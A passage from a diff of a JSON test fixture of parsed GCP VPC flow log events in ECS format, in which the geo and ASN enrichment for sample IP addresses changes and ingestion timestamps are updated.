"{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:50.830164366Z", - "end": "2019-06-14T03:42:50.942543211Z", - "id": "bxuq05fhgmw9h", - "category": "network", - "type": "connection" } }, { @@ -14699,11 +15410,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14772,7 +15488,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391995300Z", + "ingested": "2021-12-14T14:43:27.415251161Z", "original": "{\"insertId\":\"bxuq05fhgmw92\",\"jsonPayload\":{\"bytes_sent\":\"358920\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"61\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", @@ -14794,11 +15510,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53104, @@ -14870,7 +15591,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391999800Z", + "ingested": "2021-12-14T14:43:27.415251565Z", "original": "{\"insertId\":\"bxuq05fhgmw8u\",\"jsonPayload\":{\"bytes_sent\":\"653827\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53104},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"286\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", @@ -14886,11 +15607,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14965,7 +15691,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392004Z", + "ingested": "2021-12-14T14:43:27.415251987Z", "original": "{\"insertId\":\"bxuq05fhgmw9g\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", @@ -14987,11 +15713,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -15060,7 +15791,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392008100Z", + "ingested": "2021-12-14T14:43:27.415252389Z", "original": "{\"insertId\":\"bxuq05fhgmw91\",\"jsonPayload\":{\"bytes_sent\":\"31140\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"40\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", @@ -15158,7 +15889,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392011400Z", + "ingested": "2021-12-14T14:43:27.415252782Z", "original": "{\"insertId\":\"bxuq05fhgmw95\",\"jsonPayload\":{\"bytes_sent\":\"1610630\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"509\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", @@ -15174,11 +15905,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53104, @@ -15256,7 +15992,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392015600Z", + "ingested": "2021-12-14T14:43:27.415253204Z", "original": "{\"insertId\":\"bxuq05fhgmw9a\",\"jsonPayload\":{\"bytes_sent\":\"37145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53104,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"158\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", @@ -15267,9 +16003,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.291Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } + } + }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -15278,11 +16044,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53972, @@ -15290,6 +16061,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415253704Z", + "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:20.634231041Z", + "end": "2019-06-14T03:44:20.748121914Z", + "id": "198begsfh44xy3", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15301,17 +16082,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", + "192.168.2.117", "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -15326,27 +16112,9 @@ } }, "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } + "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392021100Z", - "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:20.634231041Z", - "end": "2019-06-14T03:44:20.748121914Z", - "id": "198begsfh44xy3", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -15367,6 +16135,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415254093Z", + "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:20.512264850Z", + "end": "2019-06-14T03:49:20.632737426Z", + "id": "198begsfh44xxt", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15378,19 +16156,27 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -15401,26 +16187,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392026700Z", - "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:20.512264850Z", - "end": "2019-06-14T03:49:20.632737426Z", - "id": "198begsfh44xxt", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", @@ -15441,6 +16209,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415254604Z", + "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:20.512407536Z", + "end": "2019-06-14T03:49:20.632777660Z", + "id": "198begsfh44xy8", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15452,7 +16230,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -15460,12 +16240,18 @@ "related": { "ip": [ "10.87.40.76", - "192.168.2.117" + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { - "reporter": "SRC" + "reporter": "SRC", + "rtt": { + "ms": 36 + } }, "source": { "vpc": { @@ -15480,28 +16266,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392032200Z", - "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:20.512407536Z", - "end": "2019-06-14T03:49:20.632777660Z", - "id": "198begsfh44xy8", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 60756, @@ -15515,6 +16291,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415255072Z", + "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:10.912193869Z", + "end": "2019-06-14T03:43:11.032929292Z", + "id": "198begsfh44xy9", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15526,25 +16312,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "67.43.156.14", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -15555,23 +16340,11 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392036900Z", - "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:10.912193869Z", - "end": "2019-06-14T03:43:11.032929292Z", - "id": "198begsfh44xy9", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 22, @@ -15581,12 +16354,15 @@ "source": { "geo": { "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 4837 + "number": 35908 }, "address": "67.43.156.14", "port": 14236, @@ -15594,6 +16370,16 @@ "ip": "67.43.156.14", "packets": 3 }, + "event": { + "ingested": "2021-12-14T14:43:27.415255548Z", + "original": 